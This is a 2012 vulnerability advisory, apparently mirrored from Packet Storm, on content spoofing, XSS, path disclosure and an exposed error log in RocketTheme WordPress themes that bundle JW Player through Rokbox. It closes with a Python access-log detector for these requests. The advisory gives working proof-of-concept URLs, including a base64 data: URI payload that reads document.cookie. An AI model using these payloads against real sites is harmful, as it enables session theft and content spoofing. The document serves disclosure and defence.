WordPress Rokbox Themes Content Spoofing / XSS

24 Dec 2012 00:00:00 | Reported by MustLive | Type: packetstorm | Source: packetstormsecurity.com

Multiple Rokbox WordPress Themes Vulnerabilities Disclose

Hello list!
  
Some time ago, when I found vulnerabilities in the BuddyPress plugin for
WordPress (particularly in the Affinity BuddyPress theme for it) with Rokbox,
which I disclosed earlier, I also found multiple vulnerable themes for WP
with Rokbox.
  
So I want to warn you about multiple vulnerabilities in multiple themes for
WordPress. These are themes developed by Rokbox's developers, and they put
Rokbox (with JW Player, but without TimThumb) into their themes.
  
These are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities. I disclosed vulnerabilities in JW
Player in June and August (including in the commercial version, JW Player Pro)
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities
are similar to the vulnerabilities in the Affinity BuddyPress theme. I have also found
many WP themes by other developers with Rokbox, but I will write about them
separately, because they have many more holes.
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are all WordPress themes by RocketTheme (during quick research I
found 16 themes for WP, in addition to the above-mentioned theme for BP, but I
suppose all their themes contain Rokbox with JW Player 4.4.198). They
haven't removed this vulnerable version of JW Player from Rokbox, and so from
any of their themes (for WP and BP), since I informed them in August.
  
Here are these 16 vulnerable themes, which I found:  
  
rt_afterburner_wp  
rt_refraction_wp  
rt_solarsentinel_wp  
rt_mixxmag_wp (Mixxmag)  
rt_iridium_wp  
rt_infuse_wp (infuse)  
rt_perihelion_wp  
rt_replicant2_wp  
rt_affinity_wp  
rt_nexus_wp  
rt_sentinel  
rt_mynxx_wp_vestnikp  
rt_mynxx_wp (rt.mynxx.wp)  
rt_moxy_wp  
rt_terrantribune_wp  
rt_meridian_wp  
  
They will be added to the 94 vulnerable themes for WordPress in which
I have found vulnerabilities (http://websecurity.com.ua/4915/).
  
In Google's index there are now up to 634000 pages with Rokbox on WP sites,
so there are a lot of vulnerable themes and web sites with these themes.
  
----------  
Details:  
----------  
  
The paths for these themes are the following:
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_solarsentinel_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/Mixxmag/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_iridium_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_infuse_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/infuse/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_perihelion_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_replicant2_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_affinity_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_nexus_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_sentinel/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mynxx_wp_vestnikp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_mynxx_wp/js/rokbox/jwplayer/jwplayer.swf  
http://site/wordpress/wp-content/themes/rt.mynxx.wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_moxy_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_terrantribune_wp/js/rokbox/jwplayer/jwplayer.swf  
  
http://site/wordpress/wp-content/themes/rt_meridian_wp/js/rokbox/jwplayer/jwplayer.swf  
  
Content Spoofing (WASC-12):  
  
In the file parameter both video and audio files can be set.

The swf file of JW Player accepts arbitrary addresses in the file and
image parameters, which allows spoofing the content of the flash, i.e. by setting
addresses of video (audio) and/or image files from another site.
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg  
  
Content Spoofing (WASC-12):  
  
The swf file of JW Player accepts arbitrary addresses in the config parameter, which
allows spoofing the content of the flash, i.e. by setting the address of a config file
from another site (the file and image parameters in the xml file accept arbitrary
addresses). For loading a config file from another site, that site needs to have
crossdomain.xml.
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=1.xml  
  
1.xml  
  
<config>  
<file>1.flv</file>  
<image>1.jpg</image>  
</config>  
  
Content Spoofing (WASC-12):  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site  
  
XSS (WASC-08):  
  
http://site/wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B  
  
Full path disclosure (WASC-13):  
  
In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for
the other themes), which works with default PHP settings. Potentially there
is also FPD in other php files of these themes.
  
Information Leakage (WASC-13):  
  
There are sites with the rt_mixxmag_wp theme which have an error log with full
paths.
  
http://site/wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log  
  
------------  
Timeline:  
------------   
  
2012.05.29 - informed developers of JW Player.  
2012.06.06 - disclosed at my site about JW Player.  
2012.08.18 - informed developers about new holes in JW Player Pro.  
2012.08.23 - disclosed at my site about JW Player Pro.  
2012.08.28 - informed developers of Rokbox.  
2012.12.14 - disclosed at my site about Rokbox.  
2012.12.23 - disclosed to the lists about multiple themes for WordPress with   
Rokbox.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
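An added detection example, not part of MustLive's advisory nor RocketTheme's or Rokbox's code: it parses constructed access-log lines and flags requests to a theme's jwplayer.swf whose file, image, config or aboutlink parameter points at another host or uses a data:/javascript: scheme, plus requests for the rokbox error_log described above. The site host name `site`, the log lines and the host `other.example` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote
# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2012:10:01:02 +0000] "GET /wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg HTTP/1.1" 200 51234
203.0.113.5 - - [24/Dec/2012:10:01:03 +0000] "GET /wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?config=http://other.example/1.xml HTTP/1.1" 200 51234
203.0.113.5 - - [24/Dec/2012:10:01:04 +0000] "GET /wordpress/wp-content/themes/rt_afterburner_wp/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD4 HTTP/1.1" 200 51234
203.0.113.5 - - [24/Dec/2012:10:01:05 +0000] "GET /wordpress/wp-content/themes/rt_mixxmag_wp/js/rokbox/error_log HTTP/1.1" 200 8192
198.51.100.7 - - [24/Dec/2012:10:02:00 +0000] "GET /wordpress/index.php HTTP/1.1" 200 3001
"""
REQ_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/')
SWF_PATH = "/js/rokbox/jwplayer/jwplayer.swf"   # JW Player shipped inside Rokbox
ERRLOG_PATH = "/js/rokbox/error_log"            # error log exposing full paths
URL_PARAMS = ("file", "image", "config", "aboutlink")  # parameters that accept arbitrary addresses
BAD_SCHEMES = ("data:", "javascript:", "vbscript:")

def classify(request_target, own_host="site"):
    """Return findings for one request target (path?query); empty if nothing suspicious."""
    parts = urlsplit(request_target)
    findings = []
    if parts.path.endswith(ERRLOG_PATH):
        findings.append("info-leak: rokbox error_log requested")
    if not parts.path.endswith(SWF_PATH):
        return findings
    for pair in parts.query.split("&"):   # split on '&' only: ';' must stay inside data: URIs
        name, _, raw = pair.partition("=")
        if name not in URL_PARAMS:
            continue
        value = unquote(raw).strip().lower()
        if value.startswith(BAD_SCHEMES):
            findings.append(f"xss: {name} uses {value.split(':', 1)[0]}: scheme")
        elif "://" in value or value.startswith("//"):
            host = urlsplit(value if "://" in value else "http:" + value).hostname or ""
            if host != own_host.lower():
                findings.append(f"content-spoofing: {name} points to external host {host}")
    return findings

def scan_log(text, own_host="site"):
    """Return (request_target, finding) pairs for every suspicious request in an access log."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.search(line)
        if m:
            hits.extend((m.group(1), f) for f in classify(m.group(1), own_host))
    return hits

if __name__ == "__main__":
    for target, finding in scan_log(SAMPLE_LOG):
        print(f"{finding:60} {target}")
```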
